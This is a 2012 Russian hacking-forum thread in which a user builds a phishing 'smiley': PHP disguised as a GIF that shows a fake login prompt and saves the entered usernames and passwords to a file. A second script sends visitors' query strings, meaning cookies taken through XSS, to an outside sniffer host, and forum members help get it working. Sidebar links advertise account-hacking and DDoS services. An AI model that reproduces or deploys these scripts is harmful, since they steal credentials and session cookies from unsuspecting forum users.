Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - смайл авторизации Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Новичкам RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, Leo08, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Для тех, кто не знаете с чего начать. Темы "Хочу стать хакером" удаляются, авторам предупреждение ибо читайте раздел "Статьи"

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 9899
смайл авторизации
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
HACKZONEE




Scum of Society
# | Сообщение добавлено 07.05.2012 21:26:36
Отредактировано 08.05.2012 00:10:38 by Leo08
доброго времени суток уважаемые хакеры, и не уважаемые нови4ки хех ) правда жизни, без обид !
залил на хостинг фейк,далее залил на этот же хостинг смайл с авторизацией, при заходе на страницу фейка вылетает табли4ка авторизации. но когда вставил смайл на другой сайт он отображается все впоряде но не вылетает форма авторизации. вставлял так <img src="http://shopcarnege.h16.ru/smile.gif"> .
Так же по этому адресу : http://shopcarnege.h16.ru можете посмотреть 4то форма авторизации вылетает.
кто подскажет в 4ем проблема ?
файлы :
1. .htaccess
код :
<Files "smile.gif">
AddType application/x-httpd-php .gif
</Files>
 
2. smile.gif
 
код :
PHP

<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
 $login = $_SERVER['PHP_AUTH_USER'];
 $pass  = $_SERVER['PHP_AUTH_PW'];
 //Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
 if(strlen($pass) <= 4 || !$login)
 {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="coastal.ru - login"');
 }
 elseif($login)
 {
  //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
  setcookie('LOGON',md5($pass));
  //запишем пароли в файл
  $f = fopen('passwords.txt', 'ab'); //passwords.txt
  fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
  fclose($f);
 }
}
imagegif($image);
imagedestroy($image);
?>
 
3. mellow.gif
просто смайлик
Сказать спасибо Ответить Цитировать

Virous



Moderator
Gold Member
# | Сообщение добавлено 07.05.2012 23:35:35
Откровенно говоря, Ваше сообщение пришлось расшифровывать, ибо это, правда жизни, абра-кодабра.
 
Я так понял, что Вы пытаетесь вывести форму авторизации средствами Apache. Судя по всему, другой хост - не Apache, или он настроен неверно.
 
Я бы написал письмо хостеру.
 
Добавлено 07.05.2012 23:36:37 (через 1 минута 2 секунды )
 
P.S. Для кода есть специальные теги. Так понять что-либо крайне проблематично)
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

HACKZONEE




Scum of Society
# | Сообщение добавлено 08.05.2012 00:56:58
все сделал 4тоб там вылетало окно авторизации. как сделать 4тоб его нельзя было закрыть ?
Сказать спасибо Ответить Цитировать

Virous



Moderator
Gold Member
# | Сообщение добавлено 08.05.2012 10:41:48
Только реализовать окно самому, причем не как окно, а как DIV с нужным CSS оформлением.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

HACKZONEE




Scum of Society
# | Сообщение добавлено 08.05.2012 16:35:59
дай пожалуйста ссылки на инфу как реализовывать и вызывать такие окна
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 08.05.2012 17:30:43
Отредактировано 08.05.2012 17:32:00 by superhacker
Инфу подобную видел здесь, правда код кривоват там.
 
Сказать спасибо Ответить Цитировать

HACKZONEE




Scum of Society
# | Сообщение добавлено 10.05.2012 01:27:00
Отредактировано 10.05.2012 02:43:29 by HACKZONEE
superhacker досканально изу4ил данный тобой топик_ в нем рассказывается как вызвать данную форму и то как то размыто все, перешел еще по паро4ке ссылок и нашел информацию о смайлике варющим куки приминяющемся в хсс уязвимостях_ вот сей4ас его попробую _полу4ается 4то сказка с смайликам такая же но он в вылетающею форму авторизации подставляет уже кукисы и пользователю остается только отправить данные которые летят на онлайн синфер. не знаю по4ему и меня нихрена не полу4илось хотя сделал все правильно так как написано здесь http://hacker-pro.net/thread/11170/p1.html
 
вот код файла : pic.gif
 
Text
<?php
//////////////////////////////////////////////////////////
// Powered by hacker-pro.net
function show_image($image_filename)
{
    if (!$image = @fopen($image_filename, "rb")) {
        if (!file_exists($filename)) die("Файл не найден");
            else die("Не удается открыть файл");
    }
    header("Content-Type: image/gif");
    fpassthru($image);
    fclose($image);
}
 
$alias = '3j9o6n1h39'; // Ваш алиас на hacker-pro.net/sniffer/
$image_filename = 'cool.gif'; // Название картинки
//////////////////////////////////////////////////////////
show_image($image_filename);
//////////////////////////////////////////////////////////
$sniffed['query'] = $_SERVER['QUERY_STRING'];
if(strlen($sniffed['query']) < 1) { 
$sniffed['query'] = 'empty';
}
$string_writetosn = $sniffed['query'];
$string_writetosn = str_replace(' ','+',$string_writetosn); // заменяем пробелы для юрла
$url_to_get = 'http://httpz.ru/n' . $alias . '.gif?' . $string_writetosn;
$getsnimg = file_get_contents($url_to_get);

 
ФАЙЛ : .htaccess
 
Text
<Files "pic.gif">
AddType application/x-httpd-php .gif
</Files>

ФАЙл : cool.gif ну это уже просто смайлик который подставляется. так вот смайлик отображается ,вот он http://voinapravil.h16.ru/pic.gif и на форумах тоже отображается, но форма авторизации не вылетает.  в 4ем дело ? может в коде какие ошибки ?
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Разное / Продам, отдам » Продам свежие, июнь 2019, базы 2ГИС(2gis), яндекс.карты
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}